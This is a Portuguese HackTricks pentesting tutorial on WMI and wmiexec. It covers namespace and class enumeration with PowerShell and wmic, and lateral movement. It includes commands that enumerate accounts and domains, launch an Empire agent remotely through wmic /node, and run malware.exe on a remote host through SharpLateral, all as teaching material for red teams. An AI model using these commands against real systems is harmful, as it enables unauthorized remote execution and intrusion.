6.8 KiB
WmicExec
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
Como Funciona Explicado
Processos podem ser abertos em hosts onde o nome de usuário e a senha ou hash são conhecidos através do uso do WMI. Comandos são executados usando o WMI pelo Wmiexec, proporcionando uma experiência de shell semi-interativa.
dcomexec.py: Utilizando diferentes pontos de extremidade DCOM, este script oferece um shell semi-interativo semelhante ao wmiexec.py, especificamente alavancando o objeto DCOM ShellBrowserWindow. Atualmente suporta MMC20. Aplicação, Janelas do Shell e objetos de Janela do Navegador do Shell. (fonte: Hacking Articles)
Fundamentos do WMI
Namespace
Estruturado em uma hierarquia de estilo de diretório, o contêiner de nível superior do WMI é \root, sob o qual diretórios adicionais, referidos como namespaces, são organizados. Comandos para listar namespaces:
# Retrieval of Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name
# Enumeration of all namespaces (administrator privileges may be required)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
# Listing of namespaces within "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
As classes dentro de um namespace podem ser listadas usando:
gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
gwmi -Namespace "root/microsoft" -List -Recurse
Classes
Conhecer o nome de uma classe WMI, como win32_process, e o namespace em que ela reside é crucial para qualquer operação WMI.
Comandos para listar classes começando com win32
:
Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
Invocação de uma classe:
# Defaults to "root/cimv2" when namespace isn't specified
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
Métodos
Métodos, que são uma ou mais funções executáveis das classes WMI, podem ser executados.
# Class loading, method listing, and execution
$c = [wmiclass]"win32_share"
$c.methods
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
# Method listing and invocation
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
Enumeração WMI
Status do Serviço WMI
Comandos para verificar se o serviço WMI está operacional:
# WMI service status check
Get-Service Winmgmt
# Via CMD
net start | findstr "Instrumentation"
Informações do Sistema e Processo
Coletando informações do sistema e processo através do WMI:
Get-WmiObject -ClassName win32_operatingsystem | select * | more
Get-WmiObject win32_process | Select Name, Processid
Para os atacantes, o WMI é uma ferramenta potente para enumerar dados sensíveis sobre sistemas ou domínios.
wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list
Consulta Remota Manual do WMI
A identificação furtiva de administradores locais em uma máquina remota e usuários logados pode ser alcançada por meio de consultas específicas do WMI. O wmic
também suporta a leitura de um arquivo de texto para executar comandos em vários nós simultaneamente.
Para executar remotamente um processo via WMI, como implantar um agente Empire, a seguinte estrutura de comando é empregada, com a execução bem-sucedida indicada por um valor de retorno "0":
wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
Este processo ilustra a capacidade do WMI para execução remota e enumeração de sistemas, destacando sua utilidade tanto para administração de sistemas quanto para testes de penetração.
Referências
Ferramentas Automáticas
{% code overflow="wrap" %}
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
{% endcode %}
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.